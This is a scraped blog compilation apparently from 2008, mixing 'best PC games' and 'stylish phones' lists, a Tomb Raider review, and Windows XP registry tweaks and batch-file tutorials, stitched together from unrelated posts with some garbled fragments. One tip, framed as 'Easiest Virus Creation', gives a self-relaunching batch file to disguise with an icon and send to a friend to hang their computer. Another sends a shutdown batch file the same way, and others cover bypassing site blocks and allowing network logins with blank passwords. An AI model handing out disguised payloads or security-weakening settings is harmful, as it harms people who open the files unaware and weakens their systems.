[HOW TO] Add a comment form beneath your blog posts

Blogger have developed an inline (embedded) comment form which can be enabled through Blogger in Draft. This is probably the most requested feature for Blogger, and I'm sure many of you will want to use this straight away!

Best PC Games Of 2008

Ten – Dead Space

Dead Space felt a little bit clunky on the PC and was undoubtedly designed for consoles first, but while that may have held the game back just a little there’s still no denying that it’s one of the best and scariest third person shooters of this year. Arguably, it’s the game that Doom 3 should have been.

Dead Space is about a rescue and repair team that responds to an emergency broadcast but quickly finds themselves in over their heads. What the team had expected to be a series of purely mechanical failures turns out to be something a lot more sinister.

EA has produced something worth more than the sum of its parts and the game becomes a truly rewarding experience.

Nine – Call of Duty: World at War

World at War is, it has to be said, not as strong an entry in the series as last year's Modern Warfare and the shift from Infinity Ward back to Treyarch has caused some problems for the franchise. The move to modern times was very well received, so taking things back to World War II was always going to be a risky move.

World at War is a great little game, stringing together the most iconic moments of the war by taking inspiration from the likes of Enemy at the Gates. Couple that with some awesome voice work from high profile celebrities like Kiefer Sutherland and World at War plays more like a Hollywood war movie than any other Call of Duty in a long time.

The combination of questionable presentation and classic gameplay doesn’t work as well as it once did, but nor does it fall totally flat – World at War is still a very enjoyable game.

Eight – Audiosurf

Audiosurf was one of the highlights of our gaming year and it’s very gratifying to see that the same is true for our readers. Having burst onto the gaming scene quite unexpectedly earlier this year, Audiosurf is the creation of indie developer Dylan Fitterer who ushered this arcade gem onto Steam in early 2008.

Along similar lines to Guitar Hero, Audiosurf is a reflex-based game where players have to collect coloured bricks in a grid, matching similar colours to free up spaces and win points. It sounds complex, but it really isn’t.

What makes Audiosurf stand apart though is the fact that it doesn’t rely wholly on a fairly limited and preset tracklist, like the Guitar Hero games do. Instead, it lets players upload their own music into the game, reading each track and creating a level based on the tempo and melody of that song.

Slow climaxes are represented as dawdling uphill stretches with occasional blobs of colour while pounding finales appear as downhill sprints through huge tunnels, colours flashing before your eyes like the life of a stuntman. As the tunes wax and wane the levels fall and rise, twist, turn and pulse to whatever beat you’ve chosen.


Seven – Crysis: Warhead

When the original Crysis was released it was a subject of much debate because, while the game definitely looked good and played OK, the steep hardware requirements meant that the definitive Crysis experience was off-limits for many.

Borrowing an idea from other Electronic Arts partner Valve, Crysis: Warhead tells a parallel story to the original game, following the original plot and timeline but from a different viewpoint. Instead of playing through the eyes of Nomad, players take the role of Psycho – the less restrained Jason-Statham-alike of the original game.

Trapped on the other side of the island to Nomad, Psycho is pursuing objectives of his own as he evades aliens, kills Koreans and tries not to freeze to death in the flash-iced tropical island. It’s all south of FUBAR and all Psycho has is his stiff upper lip and an assault rifle. Warhead though, Crytek showed that it understood how a linear, scripted experience can often be more powerful than an open sandbox one.

Six – Race Driver: GRID

Race Driver: GRID looks like just any other racing game if you take it at face value. It’s got lots of narrow little street races, shiny cars and remarkably high polygon counts and a design which means you can’t really do very well until you’ve learned the tracks like the back of your hand.

GRID is sharper than your first lemon and slicker than the world's biggest water slide, with players zipping up and round the tracks faster than we can come up with witty analogies. The corners are tight, the competition fierce and the in-game physics so realistic that you’re lucky if you aren’t thrown out of your chair if you take a corner too hard.

If you do take a corner too hard then you’d better expect to feel the damage on your car too – the damage models are jaw dropping and you can come up with some truly fantastic crashes if you want to. Or if you’re just an awful driver like me. Either way, you can almost taste the burning metal as the gravel tears away the paint – that, combined with the accessible simulation-cum-arcade gameplay, makes Race Driver: GRID easily better than any other racing game we’ve seen this year.

Five – Far Cry 2

Far Cry 2 may have got some of you down with some fairly repetitive missions, but it’s hard to deny how much innovation and beauty there is in the game. Ubisoft’s follow-up to the original Far Cry may have no connection to the first game in terms of story or location, but it captures that sense of strategic freedom perfectly.

It casts players as a simple mercenary, one of many operating in the African savannah, all of whom are trying to take down a local gun runner called The Jackal – a man deeply entrenched in the politics of a civil war.

Finding where The Jackal is won’t be easy though – and nor will killing him. At the start of the game you’re already indebted to local factions, pretty much defenceless and coming down with malaria. You need friends, supplies and medicine. You’ll need to wade deep into the local war and earn all these things.

With a smattering of original ideas, such as the cool healing system, and the best flamethrower in the history of gaming, Far Cry 2 definitely deserves to be on this list.

Four – Grand Theft Auto IV PC

Rockstar has made the best Grand Theft Auto game ever this year.

Looking at the game as a whole, GTA IV PC isn’t wholly different from any of the other Grand Theft Auto games. You play a guy, down on his luck and involved with the wrong people, who starts a life of crime in an American city and starts to rise from lowly gangster to feared crimelord. Along the way there are plenty of car crashes and chases, as well as the occasional RPG.

What makes Grand Theft Auto IV PC a little bit different though is that it’s the first game in the series that is really starting to take itself seriously. There glaring neons of Vice City and the rampant attitude of San Andreas have been fairly traded in for muted browns and bleak realism. It may not be to everyone’s tastes, but there’s obviously enough people out there who like it.


Three – Mass Effect PC

To say that Mass Effect is a story like no other would be a little unfair as the game does tread very similar lines to some previous BioWare games, but the story at least has never been this well told. It’s the future and you.

It’s this ability to put players in ethical grey zones that’s always made BioWare games so very worth playing, whether they cast you as the human son of the God of Murder, the amnesiac Sith-lord who almost wiped out the galaxy or simply just a distinguished solider who gets caught up in the politics of a complex universe.

What makes Mass Effect PC stand out is the sheer quality of the writing, which gives each character an appreciable sense of realism. Saving the galaxy is all very well and good, but it’s the connection you make with your crew that really drives Mass Effect PC forward and earns it a place on this list.

By giving player full real-time control of their players and a tactics overlay that pops up at a button press, Mass Effect can be as action-driven or tactical as you want.


Two – Fallout 3

Set in the future, Fallout 3 tells the story of a young person who grows up in a Vault – a vast underground complex that exists to shield a clutch of people from the nuclear war that has raged above and devastated the world. Safely imprisoned underneath the ruins of Washington DC, all is good for you in your microcosm – until your father goes missing and Vault plunges into chaos. You flee to the surface in pursuit of your dad.

As soon as you get outside though, the entire game changes and the training wheels are taken off. You can go anywhere in the Capital Wasteland, revelling in this 50s view of a post apocalyptic future. There are funny-voiced and impossibly technical cyborgs at the corner of every ruined street, looming super mutants and giant scorpions warring against bandits and settlers.

One of the best innovations that’s been bought forward into Fallout 3 though is Random Encounters – that old stalwart from the previous Fallout games which ensures that the game is always going to be slightly different no matter how often or similarly you replay the game. You can never be sure when you might stumble across Uncle Lou or a flock of deathclaws.

Game of the Year – Left 4 Dead

And really, there is a huge amount of talent that’s been poured into Left 4 Dead. We’ve played games with friends, family and people who normally abhor computer games, but the cocktail of violence and teamwork has always gone down smooth and impressed our initially unwilling team mates.

The premise for the game is simple, with the story told more through subtle visual clues than the amazing four minute cutscene that preludes the adventure. An infection has mutated nearly all of the human race, creating a race of savagely fast zombies that are hungry for the flesh of anyone who is left immune. That includes you and your three pals.

Using the same techniques as learned in Team Fortress 2, Valve has created a series of recognisable characters amid the mob of frothing infected. There’s Bill, the war-weary Vietnam veteran, Hell's Angel Francis, college-girl Zoey and office worker Louis in his red tie and designer shoes. Each of them is armed to the teeth and desperate to get away from the infection.

Opposing them are a series of brilliantly balanced opponents; the huge Tank, the shy Witch, the vicious Hunter and Smoker. Oh, and vile bile-spilling Boomer too.

None of these characters stand out nearly as much as the faceless games master behind it all though, the AI Director that sits on the sidelines of each match and moves around key resources and enemies to match the pace of the game. The AI Director is the main source of frustration, elation and fun in the game and hating or loving it is something that the whole team can get involved in – and will do when it throws two tanks in a row at you!

The game isn’t wholly co-operative though and for those who fancy more of a competitive experience there’s the rather awesome Versus mode, which sees two teams of four take it turns to try and run through a map from Co-op mode. The problem of course is that the special infected are now played by the opposing team, who get full reign to terrorise and grief the humans.

The reality is instead that no specific part of Left 4 Dead stands out because the whole game is fantastic. Everything is superbly polished, balanced, designed and made. There’s literally nothing in the game that feels more unfair than it should be. It’s within an inch of gaming perfection – which is probably why it stole almost half of the user vote!

With a fantastic multiplayer, co-operative and singleplayer experience and so much replayability Left 4 Dead is game of the year

STYLISH PHONES OF 2008

Nokia 8600 Luna



Coming from the Nokia 8-Series, the 8600 Luna, with its stunning looks, has an appetite to kill the appeal of almost every other handset around it. Its body is made of all exquisite materials. With a complete stainless steel black body and chrome lines running around it, the phone has been designed to grab attention. Except for the display area, there is an encapsulating smoked glass cover that runs around the handset.

The illuminated alphanumeric keypad under the smoked glass really looks good. However, the Luna is quite heavy at 140gm. But again, it is a matter of taste and I for one like phones that weigh a bit but only if they have the build to carry it.

Now the 8600 Luna is a phone that concentrates more on its looks than functionality. The phone is just given the bare necessities when it comes to functionality. So only expect your calls and texting to be taken care of with ease, the rest of it is questionable.

Motorola RAZR 2



Well, without the mention of a Motorola phone this article just wouldn't feel right. The RAZR has been a revolution as far as mobile handset design is considered. Building on that very success, Motorola brought out the RAZR2, which is highly appealing.

Its glossy body is made of a list of materials that went straight over my head when I first heard of them. So well this phone too has its own list of exquisite materials used in its build which could be the reason it weighs over 100 gm. Nevertheless, the phone is a head turner; its large screens of equal size seen on the inside as well as outside are impressive.

There are two versions to the RAZR2; V8 and V9. While the V8 is further available in two variants - 512MB and 2GB. The V9 simply leaves the choice up to you with a memory card slot. The RAZR2 is far more functional compared to the previously mentioned 8600 Luna, which is just all show and no go.

LG KF510



The KF510 is from the LG stable and if you are wondering how in the world an LG appeared in this list then I must remind you that LG does have a lot of credit for its design. The Chocolate handset from LG not only proves the point that the company can design but also that they can come up with innovative ideas. Well those very ideas that were born through the Chocolate handset have been carried forward to the KF510; I'm talking about Haptic Touch Navigation panel.

The KF510 hasn't scored a lot of points for its body material, but it's still got the looks with its really flashy chrome sides and the mesmerizing plain face when the large 2.2-inch screen is dead. The phone features a slim design and weighs just 91gm. The KF510 may not attract many by its looks as much as it would do through its Touch panel animations. The touch panel takes a while to get used to but once you do, it's quite a task getting back to pressing buttons for navigation.

The LG KF510 is one good-looking handset with quite a bundle of features. Its 3.5MP camera is pretty good and connectivity options well covered. The phone has one more feature that makes it different from other phones in this list. While maintaining good looks this phone is priced well within the reach of people. However, though an affordable phone is always good, affordability could also bring down its exclusivity and so may not appeal to some people.

Nokia 8800 Carbon Arte



This one again is from the 8-series of Nokia phones, a line up of premium handsets. The 8800 started it all and till date has quite an appeal. In fact, the company works more on stitching a new outfit for it than make some technical upgrades. From the base 8800, to the Sirocco, Sirocco Gold, Arte, Sapphire Arte and now the Carbon Arte, Nokia 8800 seems like it will soon have quite a wardrobe.

The 8800 was released two years back and has impressed with its full steal body. It's the 8800 that gives the 8600 Luna its classy sliding design. The latest of the 8800; the Carbon Arte does see the use of exotic materials like carbon fiber, titanium, durable stainless steel, and scratch resistant glass. Add to those materials there also has been a bit of functionality upgrades over time, like now you get a 4GB of internal memory, a 3.15MP autofocus camera, and 3G support.

The Carbon Arte in particular is way expensive than its predecessors. This, as I have already mentioned, could sound good or bad but exclusivity comes at a price. The Carbon Arte won't let you down and will attract all the attention that you've paid for it.


HTC Touch Diamond



HTC Touch Diamond is really well-designed phone. It was really surprising to hear the name of the phone and then later on see an imitation of diamond cut edges at the back of the phone. The TouchFLO 3D, and cool backlight from its navigation panel add to its style.

One of the few handsets that has the looks as well as is a powerhouse of convergence. The phone earlier had issues with smooth operations but a recent update has set things flowing pretty well for the device. The TouchFLO 3D is one aspect of the phone that is sure to gain attention while being operated on the Touch Diamond's 2.8-inch screen. The phone as compared to the premium 8-Series of Nokia is a much better pick as far as both looks and functionality go.

Sony Ericsson XPERIA X1




The XPERIA like the Touch Diamond is also a Windows Mobile handset. The XPERIA packs flaunt with it. The large slick screen, edgy keys below the phone, chrome strip running around and the black metal finish all add to the phones charm.

The slide out QWERTY keypad of the phone also has flaunt-value and its silver finished keys are ergonomically cut out to improve typing. The phone is not like most windows mobile handsets in the sense of being bulky. The XPERIA is a premium handset from Sony Ericsson and we will surely see many more X's to follow with the X1 just setting the trend. The Sony Ericsson XPERIA recently launched in India and has a retail price of Rs.45,000. Way too pricey; initial exclusivity will also play a part in its overall flaunt.

Few Words

Today the phones that I've mentioned in the list are phones that demand quite a load of money not for the features they provide but for their style. Style revolves around taste and tastes differ. I'm sure there will be many who may object to an iPhone's exclusion from this list. Well, the iPhone wasn't the best looking thing, the iPhone 3G does gather some points but not enough to feature in this list.

Anyways I've had my say and would like readers to contribute their opinions on the list and their choice of a style phone. Moreover, I can't refrain from not talking about the recently announced Motorola Aura which just steals the show and will do so when it finally releases in the market.

Motorola Aura



After its announcement it just doesn't feel right not to mention about the Motorola Aura. Motorola has done it once again;they've redefined handset design. What beats all is that for the first time you've a screen that's measured in diameters! (As it is circular).

The phone has mechanically operated swivel design that opens like a blade. The phone has this unique-looking stainless steel body and with all those etchings it looks attractive. The Motorola Aura is coming soon and will surely put every other handset to shame. I wonder even if Motorola's very own RAZR2 will be able to stand up against it as far as looks are concerned. Motorola surely have always been trend-setters in their designs.

Best Mobile Phones of 2008

Nokia E71



The Nokia E71 is the first . This phone has been praised by all, not just for its functionality but also for its style and looks. People would hardly look at a QWERTY keypad phone as a style phone but this handset from Nokia has changed that. The Nokia E71 has little wrong with it except for its missing Blackberry Connect, which no Nokia phone will provide henceforth. Large screen, powerful, seamless usability, connectivity and sufficient multimedia features all make the Nokia E71 the best phone. If you thought the E61i from Nokia couldn t get any better, take a look at the E71. However, I still prefer the E61i over the E71.



Blackberry Bold



The Blackberry Bold, which comes in next, has changed the whole outlook of RIM and has done so convincingly. This handset s Business and Multimedia package is a perfect merger of work and play. We all know of the capabilities and productivity of Blackberry phones. The Blackberry Bold is a great-looking handset, having great flaunt-value and is a class apart. It has everything that s expected from a phone of its calibre, except for a poor image capturing optic, which shouldn t really matter.

The phone has great video capabilities; any image or video looks good on its high-res large screen. The phone has DivX and XviD capabilities. The Bold has a powerful processor under its hood that can execute most of the mobile tasks that you would want your phone to do. The Blackberry Bold is steeply priced but it s not for nothing, the power it exudes in the little package is amazing.



Apple iPhone 3G




Speaking of packages nothing comes even close to the iPhone 3G that launched in India this year. The iPhone is not just about superb interface and multi-touch but its iTunes and App store lets you enjoy a wholesome experience. The inbuilt memory of the iPhone comes as a plus point to store lots of media and enjoy it while on the move.

Some of the basics that were left out and were a cause of concern can now be fixed with several of those apps created. The phone is more like a platform for developers to harness and the public to enjoy. Style comes along with its popularity, thanks to Apple s marketing team. Another reason for the marketing team to feel proud is the sales figures of the phones, which are running past many mobile manufacturers numbers. Three cheers to the iPhone 3G!



Samsung INNOV8 i8510


The Samsung INNOV8 is seriously an INNOV8ive mobile device. I would go to the extent of saying that it is this year s Nokia N95 8GB. The Nokia N95 8GB till date is the best buy and my recommendation to anyone who has the budget. The INNOV8 is not a style phone but a convergence device. It costs an arm and will definitely not appeal to all. Practically speaking, a digicam, PMP and a phone separately would do all for the kind of dough you d spend on this one. The very fact that it can do all of it pretty decently is an achievement in itself. Samsung with this handset has proved that it is out to capture Nokia s market share.



HTC Touch Diamond




The HTC Touch Diamond has earned its respect but has done so recently. The phone when launched was sluggish and got thrashed for not living up to the hype. But after that the phone was sent back to the RND department and the new firmware did the magic. The phone now works smooth and is really a great handset.This phone has shown what we can expect from not just HTC with its TouchFLO 3D but also Windows Mobile. With Windows Mobile 6.5 just round the corner and 7 to release later next year, the possibilities are endless. HTC Touch Diamond is the first Windows Mobile 6.1 mobile to release and given its initial downslide, HTC has worked on it to gain a spot as the best among the other mobile phones mentioned in this article.



Motorola ZINE ZN5



The Motorola ZINE ZN5 is another phone that finds a place in this list. It s not the best 5MP shooter available in the market but it s good in its own way. The camera is quick and thanks to all the Kodak algorithms, it captures images well and easily without taxing the user s capabilities. The phone is also a good multimedia device with good sound quality and image sharing. The ZINE ZN5 has Wi-Fi, which provides one with quick connectivity, something that also adds to its speciality. However, its incompetency to multitask is like a speed breaker in the phone.



Closing comments of 2008


We have come to the end of this year that has seen lots happening in the mobile industry; be it the number phones that were released or the cell phone technology popularity. But I can say with conviction that the biggest thing that happened was the launch of 3G service, which gives us a glimpse of the bright 2009 in the mobile industry.

Lara Croft's Tomb Raider : Legend

You already know the story behind this one. But believe me guys.. You start this game and you are stuck to your pcs at each juncture of the game... The game graphics is superb... The stages have been amply designed...


Its slick, enjoyable and packed with pulse-pounding action. Crystal Dynamics has slipped up in a few areas, but – by golly – they’ve got an awful lot right first time.

It all starts with Lara. Some stunning new costumes that will keep teenage boys (lets hope not literally) glued to the screen :) There are signs of last-gen console origins in the model’s rather angular appearance – a characteristic shared by other characters throughout the game – but this has disguised quite effectively by a healthy lashing of new-generation effects. The luminous skin and the dripping water on the clothes and cleavage stick in my mind for some unapparent reason. Lara’s beautifully animated too. From her gymnastic swings to the sultry way she walks into a party, you can see that the girl has real personality and class.


Having made Lara lovable once more, the team then went to work on the movement. Cleverly, the new Lara has taken inspiration from the recent Prince of Persia trilogy, running, leaping, clambering, swinging and scrambling with a genuine fluidity, and with some nice touches that can save you from a long and painful fall just when death seemed certain. In fact, much of the ledge grabbing, pole swinging action in TR: Legend is going to seem pretty familiar to those who played The Sands of Time, while her new rope and grapple works in much the same way as the chain-blade in The Two Thrones.


Next – and this seems pretty obvious – Crystal Dynamics realised that Lara is at her best when she’s doing exactly what it says on the tin: raiding tombs. In other words, we get Lara hopping around in South American and African temples, hidden realms beneath the tourist traps of Cornwall, and icy complexes high in the Himalayas.


The levels are also cunningly engineered to keep you thinking. you’ll also find yourself up to your knees in puzzles.


The platform-jumping and puzzling segments are expertly balanced with quickfire gunfights and a handful of other action sequences. The battles show off an effective targeting system and some reasonable enemy AI, and the way you can integrate acrobatic rolls or target explosive barrels keeps them feeling fresh and dynamic – think Mission Impossible II, not Rambo.

The fights aren’t as exhausting, repetitive or annoyingly difficult as they can be in the Prince of Persia games – you might not have the range of Matrix moves the Prince has seemingly on tap, but at least you don’t groan every time you see a pack of goons.


That goes double for the motorcycle chase sequences. Again, they’re the sort of thing I usually dread, but Crystal Dynamics has filled them with just enough action and crazy stunts to keep them feeling lively, without making them an obtrusive barrier to progress. The bike controls well, the jumps are spectacular, and there are some really nice action hero moments.

Micro-blogging is a form of multimedia blogging that allows users to send brief text updates (say, 140 characters or fewer) or micro media such as photos or audio clips and publish them. More XP Tricks & Hacks

Allowing Network Access with Blank Passwords



Although you can log in locally without a password, by default, WindowsXP Pro does not allow network users to access the computer without a password. Typically you will receive an Unknown error 31 if this is the case.


To change this setting:
Run gpedit.msc
Go to Computer Configuration / Windows Settings / Security Settings / Local Policies / Security Options
Double click on Accounts: Limit local account use of blank passwords to console login only
Disable this option


Disabling the F3 Search Key



If you want to disable the ability to use the F3 key from either the Windows Explorer or Internet Explorer


Start Regedit
Go to HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
Create a Dword value called NoFindFiles
Give it a value of 1
Reboot


Preventing Changes to File Associations



You can prevent users from changing associations via Windows Explorer’s Tools / Folder Options / File Types tab.
Start Regedit
Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explore
Create REG_DWORD data type NoFileAssociate
Give it a value of 1


Locking File Associations



If you have your file associations the way you want for a particular file type, you can remove it from the list that gets displayed in the Folder Options / File Types screen
Start Regedit
Go to HKEY_CLASSES_ROOT
Scroll to the file association you want to lock.
In the right panel, create a new Binary value
Call it EditFlags
Give it a value of 01 00 00 00
Now when you go to the Folder Options / File Types screen, you won’t see that file type listed.


Turning off System Beeps



If you want to turn off all system beeps (like the ones that go through your computers’ internal speaker):
Start Regedit
Go to HKEY_CURRENT_USER\Control Panel\Sound
Edit the key Beep and give it a value of No
Download reg file


Changing the Location Of Special Folders



You can modify the registry to change the location of special folders like:
My Documents
Favorites
My Pictures
Personal
Start Regedit
Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Double click on any locations you want to change and alter the path
Logoff or restart for the changes to go into effect
Note: TweakUI from Microsoft will allow you to make these changes from a dialog box as well


Setting the Recycle Bin to Always Delete



You can set the recycle bin to always delete items (like holding down the shift key when dragging files to the recycle bin)
Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ BitBucket
Set the key NukeOnDelete to 1
Download reg file


Setting the Internet Explorer Home Page



If you want to set the home page used by Internet Explorer through the registry
Start Regedit
Go to HKey_Current_User \ Software \ Microsoft \ Internet Explorer \ Main
Give the Start Page key the string value you wish set as homepage


Preparing to Move Hard Drive to Another Computer



To remove the devices from device manager when taking a HD from one computer to another,simply:
Run Regedit
Go to HKEY_LOCAL_MACHINE\ and delete the Enum section
This removes all of the hardware specific settings


Comparing Registries



While working with changes to your system, you might want to see what is changing in your Registry.Since you can export it to a text file, the steps are fairly easy
Start Regedit
With the very top level select - My Computer, on the Toolbar select Registry / Export Registry File
I usually save it to the root of the C: drive with the name before (you don’t need to add an extension)
Make the change to your system
Go back to Regedit
Press F5 to update it
Export the Registry like step 2
Name the file after and have it go in the same directory
Open up a DOS window
Go to the directory where the two exported files are
Enter FC before.reg after.reg > diff.txt
Then you can edit diff.txt with your favorite text editor.

Why cant we make a folder named "con" in windows??

The following reserved device names cannot be used as the name of a file:



CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.



CON is reserved for console, PRN is reserved for printers………..etc.



You must avoid using these names as file name.But You can make folder named con in c drive from command promt.



Press windows+r and type in cmd



then at the command prompt type md \\.\\c:\con



to remove this folder type rd \\.\\c:\con

Use Better Cache to optimize Firefox bandwidth consumption.

A lot of users use internet schemes with restrictions on the bandwidth consumption. Firefox re downloads all the heavy files even if they are in the cache ( Even if the cache size setup way too high ), this will considerably increase your bandwidth consumption. It’s very annoying to download the files again if you already have them in cache. Re-downloading the files that are already in cache will considerably decrease your browsing speed.

A very good way to save the bandwidth is to install Firefox Plugin called BetterCache.Open this page and click on install the Plugin. Restart Firefox then click on tools > add-ons. Click on the options for betterCache Plugin. Check the radio button next to never, under check pages for actuality. This way Firefox will avoid looking for new versions of the pages or elements.

Renaming Recyle Bin !!!

Want to customize your pc a bit.


To change the name of recycle bin or rename recycle bin in Windows XP,2000,NT,Me or 98, just edit a registry value:


1. Open registry editor by going to Start -> Run, and execute regedit.



2. Navigate to the following registry branch:



HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\



3. On the right pane, locate the registry key of LocalizedString.



4. Double click on LocalizedString or right click on LocalizedString and



select Modify to modify the registry value.



5. You should see the default value of



@%SystemRoot%\system32\SHELL32.dll,-8964?.



Delete the default value. and then rename (very first default value) your desired new recycle bin’s name in text, e.g. Garbage Bin.



6. Refresh your desktop or Windows Explorer by pressing F5.



You will see the new recycle bin name.

3.GOOGLE PROXY-LANGUAGE TOOLS


Use language tools like Google Translator or Google LanguageTools to access restricted sites.



Here’s what you need to do visit Google Translator and there you see under Translate, 2 types of translations are mentioned in or. One is text translator which u ignore just after or there is a website translator. Just write the website name(obviously the blocked site you want to visit) at the text box just bellow the text ” Translate a web page:“. In the language selector box select “French to English” or any language to english or English to English if you still want the site to be in english and then click on translate.



Now the intended page in english will appear as if inside google translator not the actual webpage so now we indirectly accesed blocked site as this translator site which is unblocked acts as a proxy. Trick here is that the site intended is in english but we need to translate it to english b’coz we need the translator site act as proxy so we used French 2 English in that translator.



The output link was like http://translate.google.com/translate?u=http://dishadow.blogspot.com&langpair=fr|en which was from french to english as indicated by “langpair=fr|en” and the site mentioned after “u=” in the o/p link is the site intended which is http://dishadow.blogspot.com here. If we do from english to english we’ve to write “langpair=en|en” and if we intend to view blocked site orkut.com then u=http://orkut.com resulting in total link http://translate.google.com/translate?u=http://orkut.com&langpair=en|en which can be used directly without visiting the translator sites. Due to this google translator is some times said as Google Proxy.

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc

To get it back:

Click Start then Run and type “gpedit.msc” without quotes.This opens the group policy editor. Then go to:
>Local Computer Policy

>Computer Configuration

>Administrative Templates

>Network

>QOS Packet Scheduler

> Limit Reservable Bandwidth.

Double click on Limit Reservable bandwidth. It says it is not configured, but the truth is under the ‘Explain’ tab i.e.”By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default.”

So the trick is to ENABLE reservable bandwidth, then set it to ZERO.

This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.

Easiest Virus Creation : [How to] use batch file to hang your friends' computer !!!

Open notepad and type in the following commands:

start
filename.bat

and save it as filename.bat

Remember that both the filename should be the same.

For instance:

start
sampat.bat

and save as sampat.bat

Do not forget to diguise it with a nice looking icon..

How to Implement:

Just create a batch file with this command and send it to your friend via gtalk or yahoo messenger. When he opens the file then his system hangs.

How It Works:

When one opens the batch file, it so happens that an infinite loop is created and the batch file is executed infinitely.Hence the processor is totally engaged in carrying out the batch file and hence no other process is allowed to carry out.Thus his system hangs....

[How to] use batch file to shut down your friends computer !!!

The command to shut down the computer from command prompt is “shutdown –s –t XXXX” where XXXX is the time in seconds after which the computer shuts down.

To turn off your friends comp just create a batch file with this command and send it to your friend via gtalk or yahoo messenger. When he opens the file then shut down process starts.

How to create the batch file:

Creating a batch file is very easy. Just open the note pad and type in the commands you want to be executed (each in a new line) and save it as “.bat”.

Start All your Favourite Programs with a single click

Everyone has some standard list of programs, which he starts when logs on to his computer. It’s a waste of time to start each program individually; today we are going to learn how to start all your favorite programs with a single click using batch files. Those of you who don’t know what batch files are may check this post to find out what they are.





I usually use Photoshop, Mozilla Firefox immediately after I login to my comp. So let us see how to create a batch file to start the above three programs with a single click.
First open note pad and type the following lines



CD “C:\Program Files\Adobe\Adobe Photoshop CS3\”


start Photoshop.exe


cd “C:\Program Files\Mozilla Firefox\”


start firefox.exe



Here cd switches the control to the directory following it and start command is used to start the program in that directory. You can add any number of programs to this list.


Once you have added all your favorite programs to this list, save it a startup.bat or any other name of your choice and double click on that batch file you created just now to start all your favorite programs.

Basics of Batch Programming

This tutorial explains you what batch file programming is and how to create batch files.



Batch file programming is nothing but a batch of DOS commands. If you code a lot and know many languages you are sure to notice that OS specific languages ( languages that work only on a particular operating system, eg: Visual Basic Scripting works only in Windows ) give you amazing control over the system. This is why Batch is so powerful, it gives you absolute control over DOS. Batch isn’t recommended at all because it is OS specific, but it is fun and easy to learn.




The first command you should know is ECHO. All ECHO does is simply print something onto the screen. It’s like “printf” in C or “PRINT” in Basic. Anyway, this is how we use it.



ECHO Hello World!



All right, now save the above line as a .bat file and double click it. This should be the output -



C:WINDOWSDesktop>ECHO Hello World!



Hello World!



Hmmm, notice that it shows the command before executing it. But we’re coders right? We don’t want our code to look so untidy so just add an @ sign before ECHO and execute it.



Wow! much better. The @ sign tells DOS to hide from the user whatever commands it is executing. Now, what if I want to write to a file? This is how I do it -



@ECHO Hello World > hello.txt



Simple huh? Remember, “>” to create or overwrite a file and “>>” to append ( write at the end ) of a file that already exists. Guess why this program wont work as desired to -



@ECHO Hello World > hello.txt



@ECHO Hello World Again > hello.txt



Looking at it, you will see that the program is supposed to write two lines one after another but it wont work because in the first line it will create a file called hello.txt and write the words “Hello World” to it, and in the second line it just over-writes the earlier text. So actually what it is doing is that it creates a file and writes to it and then over-writes what it had earlier written, to change this we just add a “>”. The additional “>” will make DOS append to the file. So here’s the improved form of the program -



@ECHO Hello World > hello.txt



@ECHO Hello World Again >> hello.txt



Save the above code as a .bat file and execute it, it will work without a hitch.



The next thing we should learn is the GOTO statement. GOTO is just the same as it is in BASIC or for that fact any programming language but the only difference is between the labels.



This is a label in C or BASIC - label:



This is a label in batch - :label



In C or BASIC, the “:” comes after the label and in Batch it comes before the label. Bear this in mind as you proceed. Here’s an example of the GOTO statement -



:labelone

@ECHO LoL

GOTO labelone



If you execute this code, you will see that it is an unlimited loop; it will keep printing to the screen till the end of time if you don’t interrupt it.The GOTO statement is very useful when it comes to building big Batch programs.



Now, we will learn the IF and EXIST commands. The IF command is usually used for checking if a file exists, like this -



@IF EXIST C:WINDOWSEXPLORER.EXE ECHO It exists



Observe that I have not used inverted commas ( ” ) as I would in BASIC or C. The EXIST command is only found in Batch and not in any other language. The EXIST command can also be used to check if a file does not exist, like this -



@IF NOT EXIST C:WINDOWSEXPLORER.EXE ECHO It does not exist



Remember, Batch is not a language like C or BASIC or Pascal, it cannot do mathematical functions. In Batch, all you can do is control DOS. In the above example notice that there is no THEN command as there would be in most languages.



Sick and tired off using the @ sign before each and every command ? Let’s do some research, go to the DOS prompt and type in ECHO /? and press enter.



Interesting, in this way, when you hear of a new DOS command you don’t know about, just type in “command /?” and you can get help on it. Now back to ECHO. According to the help we received by typing in ECHO /? you must have concluded if you type in ECHO OFF you no longer need to type an @ sign before every command.



Wait! just add an @ before ECHO OFF so that it does not display the message - ECHO is off.



The next command we are going to learn about is the CLS command. It stands for CLear Screen. If you know BASIC, you will have no problem understanding this command. All it does is clear the screen. Here’s an example -



@ECHO OFF

CLS

ECHO This is DOS



This command needs no further explanation but type in CLS /? to get more help on the command.



The next command we are going to learn is CD. It stands for Current Directory. It displays the current directory in which you are if you just type in “CD” but if you type in”CD C:WindowsDesktop” it will take you to the Desktop. Here’s an example -



@ECHO OFF
CD C:WindowsDesktop
ECHO Testing.. > test.txt
ECHO Testing…>>test.txt



This will change the directory to the Desktop and create a file there called test.txt and write to it. If we had not used the CD command, this is how the program would have looked.



@ECHO OFF
ECHO Testing.. > C:WindowsDesktoptest.txt
ECHO Testing…>> C:WindowsDesktoptest.txt



See the difference?



Anyway that’s all for the The Basics of Batch File Programming. Remember, each an every DOS command can be used in Batch.
